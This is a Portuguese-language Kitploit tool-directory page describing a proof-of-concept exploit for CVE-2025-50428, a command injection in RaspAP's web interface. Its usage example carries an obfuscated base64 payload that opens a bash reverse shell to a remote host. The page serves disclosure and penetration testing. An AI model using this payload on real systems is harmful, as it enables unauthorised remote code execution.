Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-50428 — Prova de conceito para a vulnerabilidade CVE-2025-50428: Injeção autenticada de comandos do sistema operacional no RaspAP | Kitploit
Ferramentas/GitHubGitHub/security-smarttecs/cve-2025-50428
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

Prova de conceito para a vulnerabilidade CVE-2025-50428: Injeção autenticada de comandos do sistema operacional no RaspAP

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

CVE Severity Product Version

CVE-2025-50428 - Injeção de Comandos no RaspAP

Um exploit de prova de conceito para CVE-2025-50428, uma vulnerabilidade de injeção de comandos no RaspAP raspap-webgui 3.2.9 e versões anteriores.


ID da VulnerabilidadeCVE-2025-50428
SeveridadeAlta (CVSS 3.1: 8.6)
Vetor CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Tipo de VulnerabilidadeInjeção de Código
Vetor de AtaqueRemoto (Autenticado)
Privilégios NecessáriosBaixo
ImpactoExecução de Código, Escalonamento de Privilégios
Produto Afetadoraspap-webgui ≤ 3.2.9
Descoberto porSmartTECS Cyber Security GmbH

Descrição

Este exploit tem como alvo uma vulnerabilidade de injeção de comandos no script hostapd.php do RaspAP. A vulnerabilidade existe devido à sanitização inadequada da entrada do usuário passada por meio do parâmetro interface. Um atacante autenticado pode injetar comandos arbitrários do sistema operacional, resultando na execução de código com os privilégios do usuário www-data.

Versões Vulneráveis

  • raspap-webgui ≤ 3.2.9

Requisitos

  • Python 3.x
  • biblioteca requests instalada
  • Alvo executando uma versão vulnerável do RaspAP
  • Credenciais de login válidas do RaspAP

Uso

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

Parâmetros

  • --base-url: URL base da instalação do RaspAP (ex.: http://192.168.122.22)
  • --interface: Valor para o parâmetro interface, payload de injeção permitido
  • --username: Nome de usuário do RaspAP (padrão: admin)
  • --password: Senha do RaspAP (padrão: secret)

Exemplo

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

Como Funciona

  1. O script autentica na interface web do RaspAP usando as credenciais fornecidas.
  2. Ele recupera um token CSRF válido do servidor.
  3. Uma requisição POST é enviada para hostapd.php com o parâmetro interface contendo um payload malicioso de injeção de comandos.
  4. Os comandos injetados são executados no sistema alvo com privilégios de www-data.

Notas

  • O exploit requer credenciais válidas.
  • A exploração bem-sucedida permite a execução arbitrária de comandos, que pode ser encadeada para escalonamento de privilégios.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH é uma empresa de cibersegurança especializada em testes de penetração, desenvolvimento seguro de software e pesquisa de vulnerabilidades. A empresa oferece avaliações de segurança personalizadas, resposta a incidentes e serviços de consultoria estratégica para ajudar organizações a proteger sistemas críticos contra ameaças cibernéticas em constante evolução.

Aviso Legal

Esta ferramenta é fornecida estritamente para fins educacionais e de pesquisa. Use apenas em sistemas de sua propriedade ou administrados com permissão explícita. O autor e a SmartTECS Cyber Security GmbH não se responsabilizam por uso indevido ou danos.

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
Baixar ferramenta